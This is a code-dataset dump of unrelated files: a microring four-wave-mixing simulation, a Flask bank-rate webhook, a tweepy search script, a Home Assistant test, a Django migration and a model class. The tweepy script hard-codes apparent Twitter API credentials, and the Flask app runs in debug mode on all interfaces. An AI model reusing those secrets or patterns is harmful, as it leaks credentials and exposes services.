res = arange(lbdamin,lbdamax,step)
#print "Size of pump lbdas" ,lbdas.size
#print self.pumpenvelop(lbda_p)
self.pumprange = res
print "Pump range : (um)",lbdas[0],lbdas[-1]
return res
def getjointproba(self):
return self.normlattice
def getjointprobascaled(self):
return self.normlattice/self.normlattice.max()
def computeJS(self): # begin=1.545,end=1.555,step=0.0001
print self.wg.getng(self.lbda_p)
P = self.pumppower
L = self.L # Cavity length
N = self.N
lbda_s_min = self.lbda_s_min
lbda_s_max = self.lbda_s_max
lbda_i_min = self.lbda_i_min
lbda_i_max = self.lbda_i_max
step_i = (lbda_i_max-lbda_i_min)/N
step_s = (lbda_s_max-lbda_s_min)/N
a_lbda_i = arange(lbda_i_min,lbda_i_max,step_i)[0:N]
a_lbda_s = arange(lbda_s_min,lbda_s_max,step_s)[0:N]
Ni = a_lbda_i.size
Ns = a_lbda_s.size
print Ni, Ns
Ni = N
Ns = N
self.step_i = step_i
self.step_s = step_s
rangepump = self.pumprange
M = rangepump.size
dlbda_pump = (rangepump.max()-rangepump.min())/M
lattice = zeros((Ni,Ns))
a_lbda_p1 = rangepump
cav_resp_p1 = self.applycavity(a_lbda_p1)
a_p1 = self.pumpenvelop(a_lbda_p1) # pump amplitude 1
ng = self.wg.getng(self.lbda_p)
print "Steps" ,step_i,step_s
#dbgpm = 0.
pumpmax = self.pumpenvelop(self.lbda_p)
phases = zeros((Ni,Ns))
for j in xrange(Ns):
print j
lbda_s = a_lbda_s[j] # lbda_s_min+j*step_s
cav_resp_s = self.applycavity(lbda_s)
for i in xrange(Ni):
lbda_i = a_lbda_i[i] # lbda_i_min+i*step_i
a_lbda_p2 = 1./(1./lbda_s+1./lbda_i-1./a_lbda_p1)
a_p2 = self.pumpenvelop(a_lbda_p2) # pump amplitude 2
# In order to save computation time we can take a_pm = 1. for small cavities
a_dk = self.getdk(P*a_p1*conjugate(a_p1),P*a_p2*conjugate(a_p2),a_lbda_p1,a_lbda_p2,lbda_s,lbda_i)
a_pm = sinc(L/2*a_dk/pi) # the L will be added later in the global constant
#a_pm = 1.
a_res = a_p1*a_p2*a_pm*cav_resp_p1*self.applycavity(a_lbda_p2)* self.applycavity(lbda_i)*cav_resp_s #
a_res = a_res * a_lbda_p2/a_lbda_p1
# Multiply by the dlambda;
# The pump function is i um^(-1/2), dlbda_pump is in um
a_res = a_res*dlbda_pump
res = a_res.sum() # unitless
#res = res
# Multiply by the dlambda
# Since the formula was derived for domega, we have to remember that domega = -2*pi*c/lbda**2 * dlbda
lattice[i,Ns-1-j]= abs(res.real**2+res.imag**2)* (step_i/(lbda_i**2)) * (step_s/(lbda_s**2))
#print angle(res)
phases[i,Ns-1-j] = angle(res)
# Check what should be the proper formula which keeps the joint spectral amplitude instead of joint spectral probability distribution
# Apply custom filters:
# m_filter_signal =zeros((Ni,Ns))
# m_filter_idler =zeros((Ni,Ns))
# for i in arange(Ni):
# m_filter_signal[i,:] = self.filter_signal(a_lbda_s)
# for j in arange(Ns):
# m_filter_idler[:,j] = self.filter_idler(a_lbda_i)
# lattice = lattice*m_filter_signal*m_filter_idler
# Multiply by the appropriate missing constants
lattice = lattice*(c*self.Epulse*self.gamma*(self.L))**2/(2*pi**2) #/ (2*pi*ng)
Z = lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
self.normlattice = sqrt(abs(lattice/Z))
self.lattice = lattice
self.phases = phases
xi = 2*lattice.sum()
xi = tanh(sqrt(xi))**2 # Approximation valid in the case of two-mode squeezer
self.probapair = xi * (1-xi)
# Theory calculation for CW regime for comparison
vg = c/self.wg.getng(self.lbda_p)
print "Epulse (nJ) ", self.Epulse*10**9
print "gamma W-1,m-1", self.gamma
print "L (um)", L
print "T (ps)", self.T*10**12
print "vg %e" % vg
print "r : %.4f" % self.r
print "tau : %.4f" % self.tau
print "Siglbda : %.5f" % (self.siglbda)
#deltalbda = self.siglbda*sqrt(2*pi) # Such that the approx rectangular pulse results matches the gaussian def
#beta2_pulsed = (self.Epulse*self.gamma*c)**2/(32*ng**4*pi**6)*self.lbda_p**4/(L**2*deltalbda**2)*(1-self.r**2)**4/(1-self.tau*self.r)**4
xi = (self.Epulse*self.gamma*c)**2/(32*ng**4*pi**2)*self.lbda_p**4*pumpmax**4/(L**2)*(1-self.r**2)**4/(1-self.tau*self.r)**4
xi = tanh(sqrt(xi))**2
beta2_pulsed = xi * (1-xi)
#beta2_pulsed = (self.Epulse*self.T*self.gamma/(L*10**(-6)))**2*vg**4/16.*(1-self.r**2)**4/(1-self.tau*self.r)**4
xi = self.gamma**2*self.pumppower**2*(L*10**(-6))/8 * vg*self.T*(1-self.r**2)**4/(1-self.r*self.tau)**7
xi = tanh(sqrt(xi))**2
beta2_CW = xi * (1-xi)
# We multiply the lattice by a factor of two since we only integrate over half of Phi(k1,k2) and we should account for the other symmetrical half
print "Nb pairs per pulse:",self.probapair
print "Flat pulse model:", beta2_pulsed
print "CW model:", beta2_CW
lbda_i0 = (lbda_i_max+lbda_i_min)/2
lbda_s0 = (lbda_s_max+lbda_s_min)/2
self.extent = list(array([lbda_i_min-lbda_i0,lbda_i_max-lbda_i0,lbda_s_min-lbda_s0,lbda_s_max-lbda_s0])*1000) # Check where should go i and s
self.beta2_pulsed = beta2_pulsed
self.beta2_CW = beta2_CW
def getPhases(self):
return self.phases
def getAverageSpectra(self):
return self.normlattice.sum(axis = 0),self.normlattice.sum(axis = 1)
def save(self,directory="resonances_toshiba"):
timestamp = time.strftime("%m%d_%H%M",time.localtime(time.time()))
# Create repository if it does not exist
if not os.path.exists("data\\%s" % directory):
os.makedirs("data\\%s" % directory)
fname = "data\\%s\\simu_%s_r=%.3f_tau=%.3f_%.2fps_res=%d.txt" % (directory,timestamp,self.r,self.tau,self.T * 10**12,self.resonancenumber)
# Header
fw = open(fname,"w")
fw.write("#Laser parameters\n")
fw.write("%s : %.3f\n" % ("Pulse duration (ps)",self.T*10**12))
fw.write("%s : %.4f\n" % ("Pump power avg (mW)",self.pumppower*1000))
fw.write("%s : %.3f\n" % ("Repetition rate(MHz)",self.reprate/(10**6)))
fw.write("%s : %.18e\n" % ("Energy per pulse (uJ)",self.Epulse*1000000))
fw.write("%s : %.6f\n" % ("Pump wavelength (um)",self.lbda_p))
fw.write("\n#Waveguide parameters\n")
fw.write("%s : %.3f\n" % ("Width (nm)",self.wg.width))
fw.write("%s : %.3f\n" % ("Height (nm)",self.wg.height))
fw.write("%s : %.3f\n" % ("Aeff (um^2)",self.wg.Aeff))
fw.write("%s : %.3f\n" % ("gamma (W-1 m-1)",self.gamma))
fw.write("\n#Ring parameters\n")
fw.write("%s : %.3f\n" % ("Cavity length (um)",self.L))
fw.write("%s : %.5f\n" % ("Tau",self.tau))
fw.write("%s : %.5f\n" % ("r",self.r))
fw.write("\n#BiPhoton state properties\n")
fw.write("%s : %.5f\n" % ("Nb pairs per pulse",self.probapair))
fw.write("%s : %.5f\n" % ("Flat pulse model",self.beta2_pulsed))
fw.write("%s : %.5f\n" % ("CW model",self.beta2_CW))
self.computeHeraldedPhotonPurity()
#self.computePcoincfrom2photons()
#fw.write("%s : %.6f\n" % ("Visibility from two heralded sources",self.visibility))
fw.write("%s : %.6f\n" % ("Schmidt number",abs(self.schn)))
fw.write("%s : %.6f\n" % ("Purity",abs(1/self.schn)))
# Theory calculation for CW regime for comparison
vg = c/self.wg.getng(self.lbda_p)
beta2 = self.gamma**2*(self.Epulse/self.T)**2*(self.L*10**(-6))/8 * vg*self.T*(1-self.r**2)**4/(1-self.r)**7
fw.write("%s : %.5f\n" % ("Nb pairs(analytical CW)",beta2))
fw.write("\n")
fw.write("N=%d\n" % self.N)
fw.write("Resonance number : %d\n" % self.resonancenumber)
fw.write("\n#Scan range\n")
fw.write("%s : %.6e - %.6e, %.6e\n" % ("idl min, idl max, step (um)",self.lbda_i_min,self.lbda_i_max,self.step_i))
fw.write("%s : %.6e - %.6e, %.6e\n" % ("sig min, sig max, step (um)",self.lbda_s_min,self.lbda_s_max,self.step_s))
fw.write("\n#Raw data Biphoton distribution\n")
# Saves the joint spectrum
for j in xrange(self.N):
line = " ".join(("%.18e" % x) for x in self.lattice[:,self.N-1-j])
fw.write(line+"\n")
fw.write("\n#Raw data Biphoton phase distribution\n")
# Saves the joint spectrum
for j in xrange(self.N):
line = " ".join(("%.18e" % x) for x in self.phases[:,self.N-1-j])
fw.write(line+"\n")
fw.close()
return fname
def load(self,fname):
print "Loading %s ..." % fname
f = open(fname,"r")
line = f.readline()
while (len(line)>0):
if line.startswith("#Scan range"):
# Load the extent of the wavelength for signal and idler
line = f.readline() # Readline for the idler
self.lbda_i_min,self.lbda_i_max = parse_extent(line)
line = f.readline() # Readline for the signal
self.lbda_s_min,self.lbda_s_max = parse_extent(line)
self.extent = [self.lbda_i_min,self.lbda_i_max,self.lbda_s_min,self.lbda_s_max] # Check where should go i and s
if line.startswith("#Raw data Biphoton distribution"):
# Load the biphoton distribution
for j in xrange(self.N):
line = f.readline()
self.lattice[:,self.N-1-j] = parse_biphoton_data(line)
if line.startswith("#Raw data Biphoton phase distribution"):
# Load the biphoton phase distribution
for j in xrange(self.N):
line = f.readline()
self.phases[:,self.N-1-j] = parse_biphoton_data(line)
if line.find("#")>=0:
l1 = line.split("#")[0]
if line.find(":")>=0:
line = line.replace("\n","")
name,value = line.split(" : ")
if name in self.setters.keys():
self.setters[name](float(value))
elif line.startswith("N="):
name,value = line.split("=")
self.setters[name](int(value))
line = f.readline()
Z = self.lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
self.normlattice = sqrt(abs(self.lattice/Z))
f.close()
class CustomPump():
def __init__(self,fname="G2 Straight Transmission.csv"):
self.rootname = "."
self.__load__(fname)
self.__fit__()
def __load__(self,fname):
path = os.path.join(self.rootname,fname)
f = open(path)
line = f.readline()
lbdas = []
amplitudes = []
for i in arange(30):
line = f.readline()
while(len(line))>0:
splitted = line.split(",")
lbda,amplitude = splitted[0:2]
line = f.readline()
if lbda>0:
lbdas.append(float(lbda)/1000) # nm -> um
amplitudes.append(float(amplitude))
self.lbdas = array(lbdas)
self.amplitudes = array(amplitudes)
self.amplitudes = self.amplitudes/self.amplitudes.sum() # Normalise
self.lbda_p = self.lbdas[self.amplitudes.argmax()]
def __fit__(self):
# Gaussian multiplied by rational fraction to account for distorsion
a = (10**3)
b = (10**3)
c = (10**3)**1.5
d = 10
e = 1
f = 1
sig = 1.0*10**(-3) # um
p0 = [self.lbda_p,sig,a,b,c,d,e,f]
plsq = leastsq(self.__residuals__, p0, args=(self.amplitudes, self.lbdas))
self.p = plsq[0]
print self.p
# p : parameters
# lbdas : wavelengths
def __func__(self,p,lbdas):
lbda0,sig,a,b,c,d,e,f = p
dlbdas = lbdas-lbda0
res = exp(-dlbdas**2/(2*sig**2))*(a*dlbdas+f/(b*dlbdas**3+c*dlbdas**2+d*dlbdas+e))
return res
def __residuals__(self,p,y, x):
err = y-self.__func__(p,x)
return err
def getPulse(self,lbda):
return self.__func__(self.p,lbda)
def plotres(self):
lbda1,lbda2 = min(self.lbdas),max(self.lbdas)
x = arange(lbda1,lbda2,0.000001)
#self.p = (A,r,tau)
plots = [(self.lbdas,self.amplitudes,"ro"),(x,self.getPulse(x),"k-")] # (neff0 self.lbdas,self.Iouts,"ro"),
#plot(plots)
print self.lbda_p
return plots
# Fit ring when seeded by a pulse laser from which we know the shape
class RingPulsed():
def __init__(self,R,Lc,fname,pumpfunc):
self.R = R # radius (um)
self.Lc = Lc # coupling length (um)
self.L = 2*(pi*R + Lc) # Total length
#FSR = 1.5556-1.5477 # um
self.neff0 = 4.14330 #4.143277 # Starting effective group index 4.1434
self.pumpfunc = pumpfunc
self.rootname = "."
self.__load__(fname)
self.__fit__()
def __load__(self,fname):
path = os.path.join(self.rootname,fname)
f = open(path)
line = f.readline()
lbdas = []
amplitudes = []
for i in arange(30):
line = f.readline()
while(len(line))>0:
splitted = line.split(",")
lbda,amplitude = splitted[0:2]
line = f.readline()
if lbda>0:
lbdas.append(float(lbda)/1000) # nm -> um
amplitudes.append(float(amplitude))
self.lbdas = array(lbdas)
self.amplitudes = array(amplitudes)
self.amplitudes = self.amplitudes/self.amplitudes.sum() # Normalise
self.lbda_p = self.lbdas[self.amplitudes.argmin()]
# adjust the neff0 guess
m = int(self.neff0*self.L/self.lbda_p)
self.neff0 = m*self.lbda_p/self.L
def __fit__(self):
a = b = c = d=e=f=0.000000000000001
p0 = [max(self.amplitudes),0.9,0.9,self.neff0,a,b,c,d,e,f]
plsq = leastsq(self.__residuals__, p0, args=(self.amplitudes, self.lbdas))
self.p = plsq[0]
print self.p
# p : parameters
# lbdas : wavelengths
def __func__(self,p,lbdas):
A,r,tau,neff,a,b,c,d,e,f = p
dlbdas = lbdas-self.lbda_p
#neff = self.neff0
L = self.L
phi = 2*pi*L*neff/lbdas
r2 = r**2
tau2 = tau**2
K = 2*r*tau*cos(phi)
res = A*(r2+tau2-K)/(1+r2*tau2-K) * self.pumpfunc(lbdas) * (a+b*dlbdas+c*dlbdas**3)/(d+e*dlbdas+f*dlbdas**3)
return res
def ringResponse(self,p,lbdas):
A,r,tau,neff,a,b,c,d,e,f = p
dlbdas = lbdas-self.lbda_p
#neff = self.neff0
L = self.L
phi = 2*pi*L*neff/lbdas
r2 = r**2
tau2 = tau**2
K = 2*r*tau*cos(phi)
res = A*(r2+tau2-K)/(1+r2*tau2-K) * (a+b*dlbdas+c*dlbdas**3)/(d+e*dlbdas+f*dlbdas**3)*max(self.pumpfunc(lbdas))
return res
def __residuals__(self,p,y, x):
err = y-self.__func__(p,x)
return err
def getIout(self,lbda):
return self.__func__(self.p,lbda)
def plotres(self):
lbda1,lbda2 = min(self.lbdas),max(self.lbdas)
x = arange(lbda1,lbda2,0.000001)
plots = [(self.lbdas,self.amplitudes,"bo"),(x,self.getIout(x),"k-"),(x,self.ringResponse(self.p,x),"b--")] # (self.lbdas,self.Iouts,"ro"),
#plot(plots)
self.lbda_p = self.lbdas[self.amplitudes.argmin()]
print self.lbda_p
return plots
# December 15, 2004 / Vol. 29, No. 24 / OPTICS LETTERS p 2861
# Ultrahigh-quality-factor silicon-on-insulator microring resonator
def computeQ(self):
A,r,tau,neff=self.p[0:4]
return (2*pi*neff/self.lbda_p)*self.L/(-2*log(r*tau))
def main():
# Load the pulse
#pump = CustomPump("G2 Straight Transmission.csv")
#pump.plotres()
#pumpfunc = pump.getPulse
wg = Waveguide(450,220)
T = 100.*10**(-12)
#for T in [100.,50.,25.,10.,5.]:
N = 100 # 200# N = 50 Provides accurate number for r = 0.98 rings with 100ps pulses
#for T in [1000.,500.,200.,100.,50.,25.,10.]:
r = 0.93
tau = 1.-0.0198
radius = 10.
coupling_length = 5.
lbda0= 1.55
res_number = 1 # resonance number (pump resonance is 0).
for res_number in [1]: #arange(0,1):# [1,2,3,4]:
for T in [5.0] : # ,0.75,1.,1.5,2.0,0.5,1.,5.,,50.,100.,500.,1000.,2000. #arange(10.,1000,10.): # [60.,70.,80.,90.,110.,120.,130.,140.,150.,160.,170.,180.,190.,210.,220.,230.,240.,250.,260.,270.,280.,290.]: #arange(10.,100.,10.): # arange(5,55,5): #[25.,50.,100.,200.,500.]: [1.0,2.0,5.0,10.0,20.0,50.0,100.0,200.0,500.0,1000.0,]
for r in [0.9]: # [0.95,0.96,0.97,0.98,0.99]: # 0.85,0.86,0.87,0.88,0.89,0.90,0.91,0.92,0.93,0.94,0.95,0.96
for tau in [0.997]: # 0.76,0.96,0.98
#for r2 in [0.9998,0.9997,0.9996,0.9995,0.9994]: #[1.0,0.9999,0.999,0.99]:
mySim =FWM_RingSimu(wg,length = 2*(radius*pi+coupling_length),pulseduration = T*10**(-12),N = N,r = r,tau = tau,pumppower = 3.*10**-3,pumpwl = lbda0) # 500
#mySim.pumpenvelop = pumpfunc
mySim.setRangeScanResonance(+res_number)
mySim.plotcavityresponse()
mySim.updatepumprange()
mySim.computeJS()
fname = mySim.save("Ring_pumpscan")
mySim.plotBiphoton(fname[:-3]+"png")
# -----------------------------------------------------------------------------#
# MISC FUNCTIONS II: Specific FWM applications
# -----------------------------------------------------------------------------#
def plot1Dgain():
wgs = [
#Waveguide(450,220),
Waveguide(470,220)
#Waveguide(500,220),
#Waveguide(550,220),
]
plots = []
colors = ["r-","b-","g-"]
i = 0
lbda_s = arange(1.40,1.70,0.0001)
for wg in wgs:
simu = FWM_Simu(wg = wg,length = 0.0058,pumpwl = 1.5479)
res = simu.toplotCWGain(lbda_s)
plots.append((lbda_s,res,colors[i]))
i += 1
fw = open("fwm_bandwidth_cw.csv","w")
fw.write("Wavelength (um), FWM gain (a.u)")
for i in arange(lbda_s.size):
line = "%.5f,%.5f\n" % (lbda_s[i],res[i])
fw.write(line)
fw.close()
plot(plots)
def plotnbpairsScaling():
lbda_min = 1.542
lbda_max = 1.544
wg = Waveguide(550,220)
lbda_s = arange(1.5,1.6,0.0001)
tointegrate = (lbda_s>lbda_min) * (lbda_s<lbda_max)
lengths = arange(0,0.01,0.0001)
#lengths = arange(0,100.,0.1)
res = []
for L in lengths:
simu = FWM_Simu(wg = wg,length = L )
gainperbandwidth = (L/2)**2*simu.toplotCWGain(lbda_s = lbda_s) #
#res.append(gainperbandwidth[tointegrate].sum())
res.append(gainperbandwidth.sum())
plot([(lengths,res,"r-")])
if __name__ == "__main__":
#pump = CustomPump("G2 Straight Transmission.csv")
#pump.plotres()
#ring = RingPulsed(20,5,"G2 Ring Transmission.csv",pump.getPulse)
#plot(ring.plotres()+pump.plotres())
main()
#plotnbpairsScaling()
#plot1Dgain()
| [
"[email protected]"
] | |
1781619b0a8abd1d3cb474a67ee1c1d84f0bd6c4 | 080688b23a9114a41594a4483b07a8896f106102 | /app.py | 3373c706cfc92661c50d138bb12a87ac3122f194 | [
"Apache-2.0"
] | permissive | ashishqm/sept | 3160e9498190a8b60d93fc604394ab4d9c9e67ee | 0772c20417bb3d1331f3960016e4e6d861acf8ec | refs/heads/master | 2020-03-27T21:23:48.242448 | 2018-09-03T02:16:25 | 2018-09-03T02:16:25 | 147,140,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,418 | py | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/static_reply', methods=['POST'])
def static_reply():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
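    # expected request shape (Dialogflow v1 style webhook, as read below):
    # {"result": {"action": "interest",
    #             "parameters": {"bank-name": "<bank>"}}}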
if req.get("result").get("action") != "interest":
return {}
result = req.get("result")
parameters = result.get("parameters")
name = parameters.get("bank-name")
bank = {'Federal Bank':'6.70%','Andhra Bank':'6.85%', 'Allahabad Bank':'6.75%', 'Axis Bank':'6.5%', 'Bandhan bank':'7.15%', 'Bank of Maharashtra':'6.50%', 'Bank of Baroda':'6.90%', 'Bank of India':'6.60%', 'Bharatiya Mahila Bank':'7.00%', 'Canara Bank':'6.50%', 'Central Bank of India':'6.60%', 'City Union Bank':'7.10%', 'Corporation Bank':'6.75%', 'Citi Bank':'5.25%', 'DBS Bank':'6.30%', 'Dena Bank':'6.80%', 'Deutsche Bank':'6.00%', 'Dhanalakshmi Bank':'6.60%', 'DHFL Bank':'7.75%', 'HDFC Bank':'5.75% to 6.75%', 'Post Office':'7.10%', 'Indian Overseas Bank':'6.75%', 'ICICI Bank':'6.25% to 6.9%', 'IDBI Bank':'6.65%', 'Indian Bank':'4.75%', 'Indusind Bank':'6.85%', 'J&K Bank':'6.75%', 'Karnataka Bank':'6.50 to 6.90%', 'Karur Vysya Bank':'6.75%', 'Kotak Mahindra Bank':'6.6%', 'Lakshmi Vilas Bank':'7.00%', 'Nainital Bank':'7.90%', 'Oriental Bank of Commerce':'6.85%', 'Punjab National Bank':'6.75%', 'Punjab and Sind Bank':'6.4% to 6.80%', 'Saraswat bank':'6.8%', 'South Indian Bank':'6% to 6.75%', 'State Bank of India':'6.75%', 'Syndicate Bank':'6.50%', 'Tamilnad Mercantile Bank Ltd':'6.90%', 'UCO bank':'6.75%', 'United Bank Of India':'6%', 'Vijaya Bank':'6.50%', 'Yes Bank':'7.10%'}
    speech = "The interest rate of " + name + " is " + str(bank[name])
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
#"data": {},
#"contextOut": [],
"source": "BankInterestRates"
}
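# Example payload (hypothetical, shaped after the Dialogflow-v1 style fields
# read above); useful for local testing:
#   curl -X POST http://localhost:5000/static_reply \
#        -H "Content-Type: application/json" \
#        -d '{"result": {"action": "interest", "parameters": {"bank-name": "Axis Bank"}}}'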
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print ("Starting app on port %d" %(port))
app.run(debug=True, port=port, host='0.0.0.0')
| [
"[email protected]"
] | |
a1e1f711eb8af4ca585330198a42446ff9f904ef | 8afeb5e41d1efbce2b8feb8f557f263120db91d3 | /api/search_rest.py | 736b8df13c0c8c9d8ca68368185325e599ceb723 | [] | no_license | panos1995/msccs-t23 | 7bbe9ed4c9172f3f72c2ce47e14db639a95b054b | 228aaa71640f186ceb8e85c295c13d9df36611a5 | refs/heads/master | 2020-04-03T15:23:35.299920 | 2018-11-05T15:44:07 | 2018-11-05T15:44:07 | 155,361,035 | 0 | 0 | null | 2018-10-30T09:48:21 | 2018-10-30T09:48:21 | null | UTF-8 | Python | false | false | 1,162 | py | import datetime
import time
import tweepy
import pymongo
import sys
import json
from bson import json_util, ObjectId
def query_search(query):
    # AppAuthHandler takes app-level (consumer) credentials, so name them accordingly.
    consumer_key = "IHpSjYd5AuCdDRZTaGiMOwHUJ"
    consumer_secret = "FNUvxez9N9vBzY72HiZcukHQqVqO0ZiV498qyaYDxaV5nKFSgu"
    auth = tweepy.AppAuthHandler(consumer_key, consumer_secret)
    api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
if (not api):
print("Can't Authenticate")
sys.exit(-1)
time_started = time.time()
result_list = []
id_list = []
    # You can change the count and the time limit of the search.
    # Moreover, the Streaming API could be used to make this a truly real-time project.
    for tweet in tweepy.Cursor(api.search, q=query, lang="en", count=10).items():
        if time.time() > time_started + 2:  # stop after a 2-second collection window
            # mycol_all.insert(result_list)
            return result_list, id_list
        # result_list.append(json.loads(json_util.dumps({"Postid": tweet["idstr"], "Text": tweet["text"]})))
        result_list.append({"Postid": tweet._json["id_str"], "Text": tweet._json["text"]})
        id_list.append(tweet._json["id_str"])
    # Fallback: return whatever was collected if the cursor is exhausted
    # before the time limit is reached.
    return result_list, id_list
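
if __name__ == "__main__":
    # Minimal usage sketch (assumption: the hard-coded credentials above are
    # valid and there is network access; "python" is just an example query).
    tweets, ids = query_search("python")
    print("Collected %d tweets" % len(ids))
    print(json.dumps(tweets[:3], indent=2))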
| [
"[email protected]"
] | |
3f259779a113f38727e5e331c041593a3830edfe | caaf56727714f8c03be38710bc7d0434c3ec5b11 | /tests/components/telegram/test_notify.py | 7488db49d9ea58db8f78e93cab0842fa686ee119 | [
"Apache-2.0"
] | permissive | tchellomello/home-assistant | c8db86880619d7467901fd145f27e0f2f1a79acc | ed4ab403deaed9e8c95e0db728477fcb012bf4fa | refs/heads/dev | 2023-01-27T23:48:17.550374 | 2020-09-18T01:18:55 | 2020-09-18T01:18:55 | 62,690,461 | 8 | 1 | Apache-2.0 | 2023-01-13T06:02:03 | 2016-07-06T04:13:49 | Python | UTF-8 | Python | false | false | 1,598 | py | """The tests for the telegram.notify platform."""
from os import path
from homeassistant import config as hass_config
import homeassistant.components.notify as notify
from homeassistant.components.telegram import DOMAIN
from homeassistant.const import SERVICE_RELOAD
from homeassistant.setup import async_setup_component
from tests.async_mock import patch
async def test_reload_notify(hass):
"""Verify we can reload the notify service."""
with patch("homeassistant.components.telegram_bot.async_setup", return_value=True):
assert await async_setup_component(
hass,
notify.DOMAIN,
{
notify.DOMAIN: [
{
"name": DOMAIN,
"platform": DOMAIN,
"chat_id": 1,
},
]
},
)
await hass.async_block_till_done()
assert hass.services.has_service(notify.DOMAIN, DOMAIN)
yaml_path = path.join(
_get_fixtures_base_path(),
"fixtures",
"telegram/configuration.yaml",
)
with patch.object(hass_config, "YAML_CONFIG_FILE", yaml_path):
await hass.services.async_call(
DOMAIN,
SERVICE_RELOAD,
{},
blocking=True,
)
await hass.async_block_till_done()
assert not hass.services.has_service(notify.DOMAIN, DOMAIN)
assert hass.services.has_service(notify.DOMAIN, "telegram_reloaded")
def _get_fixtures_base_path():
return path.dirname(path.dirname(path.dirname(__file__)))
| [
"[email protected]"
] | |
c4b2fcaa8f6499cdca69575ead3662b305b1ccd5 | 4ed33dba672aa6aaef42698ef8437c872b078d37 | /backend/home/migrations/0001_load_initial_data.py | e78b5b69ad3761f691200103468335142fc62434 | [] | no_license | crowdbotics-apps/flat-heart-27928 | aecb93c66e39e94e01cef7fe9506effe994cde18 | ce209de8910b1e9f006814b58a05aed1eeada32d | refs/heads/master | 2023-05-26T14:51:41.045373 | 2021-06-11T20:01:34 | 2021-06-11T20:01:34 | 376,130,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | from django.db import migrations
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "flat-heart-27928.botics.co"
site_params = {
"name": "Flat Heart",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
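    # Rollback note: RunPython here has no reverse function; a reversible
    # variant (assumption, not in the original migration) would be:
    #   migrations.RunPython(create_site, migrations.RunPython.noop)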
| [
"[email protected]"
] | |
ce6667dc95fdefc8be193b41ae44902d4600a89a | 7a9c01f7029e74c697100e244d26c72d0e283d47 | /models/amenity.py | 9adbf8d9f5418e8b43eeb584cccd1acbde12617c | [] | no_license | toyugo/holbertonschool-AirBnB_clone | 63321296ecee98b1a0cda39c7b155cc2ea5ececb | 5edaeafb6516130f2027b505fe8b168f6f9de174 | refs/heads/main | 2023-03-21T06:32:18.728878 | 2021-03-04T13:08:56 | 2021-03-04T13:08:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | #!/usr/bin/python3
""" Module Amenity """
from models.base_model import BaseModel
class Amenity(BaseModel):
    """ Class Amenity, inherits from BaseModel """
name = ""
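
# Usage sketch (assumption: BaseModel supplies id / created_at / updated_at and
# a to_dict() helper, as elsewhere in this AirBnB-clone codebase):
#   amenity = Amenity()
#   amenity.name = "Wifi"
#   print(amenity.to_dict())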
| [
"[email protected]"
] |